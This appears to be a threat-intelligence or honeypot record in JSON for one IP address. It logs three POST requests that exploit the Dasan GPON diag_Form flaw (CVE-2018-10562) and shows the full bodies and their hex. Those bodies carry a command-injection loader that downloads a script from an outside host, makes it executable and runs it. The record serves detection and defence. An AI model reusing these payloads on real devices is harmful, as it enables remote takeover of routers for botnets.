{"ip":"202.53.68.18","total_events":3,"verdict":{"verdict":"malicious","label":"Exploit attempts observed","detail":"2 loader / command-injection payload(s)","confidence":"medium","network_type":"CDN","why":["2 request(s) carried a loader or command-injection payload (wget, curl, tftp, busybox, chmod or a known bot name).","This is the same evidence that puts an address in the public exploiter feed, so the feed and this page now agree.","Payload evidence stands on its own: one request that fetches a botnet binary is exploitation, not probing.","Not in any known-scanner range."],"engagement":{"level":"request","label":"Request traffic","detail":"1,721 bytes sent","bytes_sent":1721,"session_seconds":1,"persistent":false}},"first_seen":"2026-09-06T07:07:16","last_seen":"2026-09-06T07:07:17","events_24h":0,"events_7d":3,"geo":{"country_code":"IN","country_name":"India","region":"Telangana","city":"Hyderabad","lat":17.3843,"lon":78.4583,"asn":10225,"org":"Nettlinx Limited"},"source_domain":"arpa.static.18.68.53.202.nettlinx.com","known_scanners":[],"scanner_tag":{"key":"peeringdb:as10225","label":"Nettlinx","category":"cdn","url":"https://www.peeringdb.com/asn/10225"},"cve_matches":[{"cve_id":"CVE-2018-10562","title":"Dasan GPON Devices - Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/GponForm/diag_Form"}],"malware":[],"top_ports":[{"port":443,"proto":"tcp","label":"HTTPS","count":3}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"tls_ja3":[],"ja4h":["po11nn0500_ac885f862449"]},"fingerprint_peers":{"po11nn0500_ac885f862449":5},"user_agents":["Mozilla/5.0"],"timeline":[{"date":"2026-09-06","count":3}],"recent_events":[{"timestamp":"2026-09-06T07:07:17","port":443,"proto":"tcp","app_proto":"","app_protocol":"http","host":"","headers":"{\"accept\":\"*/*\",\"accept-encoding\":\"gzip, deflate\",\"content-length\":\"77\",\"content-type\":\"application/x-www-form-urlencoded\",\"user-agent\":\"Mozilla/5.0\"}","body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`sh+1.sh%3B`&ipv=0","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/GponForm/diag_Form?style/","summary":"","payload_hex":"504f5354202f47706f6e466f726d2f646961675f466f726d3f7374796c652f20485454502f312e310d0a557365722d4167656e743a204d6f7a696c6c612f352e300d0a4163636570743a202a2f2a0d0a4163636570742d456e636f64696e673a20677a69702c206465666c6174650d0a436f6e74656e742d547970653a206170706c69636174696f6e2f782d7777772d666f726d2d75726c656e636f6465640d0a436f6e74656e742d4c656e6774683a2037370d0a0d0a58576562506167654e616d653d6469616726646961675f616374696f6e3d70696e672677616e5f636f6e6c6973743d3026646573745f686f73743d6073682b312e736825334260266970763d30","method":"POST","user_agent":"Mozilla/5.0","ja3":"","session":"d427a62f-d38b-466b-8802-15b450bfaed7","seq":3,"duration_ms":743,"bytes_in":836,"bytes_out":231},{"timestamp":"2026-09-06T07:07:16","port":443,"proto":"tcp","app_proto":"","app_protocol":"http","host":"","headers":"{\"accept\":\"*/*\",\"accept-encoding\":\"gzip, deflate\",\"content-length\":\"84\",\"content-type\":\"application/x-www-form-urlencoded\",\"user-agent\":\"Mozilla/5.0\"}","body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`chmod+777+1.sh%3B`&ipv=0","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/GponForm/diag_Form?style/","summary":"","payload_hex":"504f5354202f47706f6e466f726d2f646961675f466f726d3f7374796c652f20485454502f312e310d0a557365722d4167656e743a204d6f7a696c6c612f352e300d0a4163636570743a202a2f2a0d0a4163636570742d456e636f64696e673a20677a69702c206465666c6174650d0a436f6e74656e742d547970653a206170706c69636174696f6e2f782d7777772d666f726d2d75726c656e636f6465640d0a436f6e74656e742d4c656e6774683a2038340d0a0d0a58576562506167654e616d653d6469616726646961675f616374696f6e3d70696e672677616e5f636f6e6c6973743d3026646573745f686f73743d6063686d6f642b3737372b312e736825334260266970763d30","method":"POST","user_agent":"Mozilla/5.0","ja3":"","session":"d427a62f-d38b-466b-8802-15b450bfaed7","seq":2,"duration_ms":418,"bytes_in":576,"bytes_out":154},{"timestamp":"2026-09-06T07:07:16","port":443,"proto":"tcp","app_proto":"","app_protocol":"http","host":"","headers":"{\"accept\":\"*/*\",\"accept-encoding\":\"gzip, deflate\",\"content-length\":\"125\",\"content-type\":\"application/x-www-form-urlencoded\",\"user-agent\":\"Mozilla/5.0\"}","body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`cd+/tmp%3Bwget+-q+-O+1.sh+http://198.144.179.82:80/1.sh%3B`&ipv=0","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/GponForm/diag_Form?style/","summary":"","payload_hex":"504f5354202f47706f6e466f726d2f646961675f466f726d3f7374796c652f20485454502f312e310d0a557365722d4167656e743a204d6f7a696c6c612f352e300d0a4163636570743a202a2f2a0d0a4163636570742d456e636f64696e673a20677a69702c206465666c6174650d0a436f6e74656e742d547970653a206170706c69636174696f6e2f782d7777772d666f726d2d75726c656e636f6465640d0a436f6e74656e742d4c656e6774683a203132350d0a0d0a58576562506167654e616d653d6469616726646961675f616374696f6e3d70696e672677616e5f636f6e6c6973743d3026646573745f686f73743d6063642b2f746d70253342776765742b2d712b2d4f2b312e73682b687474703a2f2f3139382e3134342e3137392e38323a38302f312e736825334260266970763d30","method":"POST","user_agent":"Mozilla/5.0","ja3":"","session":"d427a62f-d38b-466b-8802-15b450bfaed7","seq":1,"duration_ms":100,"bytes_in":309,"bytes_out":77}],"http_methods":[{"method":"POST","count":3}],"distinct_ports_total":1,"top_paths":[{"path":"/GponForm/diag_Form?style/","count":3,"ports":1}],"distinct_paths_total":1,"top_snis":[],"top_hosts":[],"top_alpns":[],"banners":[],"credentials":[],"header_profile":{"signature":["Accept","Accept-Encoding","Content-Length","Content-Type","User-Agent"],"representative":[{"name":"Accept","value":"*/*","notable":false},{"name":"Accept-Encoding","value":"gzip, deflate","notable":false},{"name":"Content-Length","value":"77","notable":false},{"name":"Content-Type","value":"application/x-www-form-urlencoded","notable":true},{"name":"User-Agent","value":"Mozilla/5.0","notable":false}],"distinct_sets":1,"events_with_headers":3},"tags":[{"tag_id":"CVE-2018-10562","tag_type":"cve","title":"Dasan GPON Devices - Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/GponForm/diag_Form","reference_urls":["https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router","https://github.com/f3d0x0/GPON/blob/master/gpon_rce.py","https://nvd.nist.gov/vuln/detail/CVE-2018-10562","https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/","https://github.com/ethicalhackeragnidhra/GPON"]}],"data_as_of":"2026-09-10T21:21:38.490946+00:00"}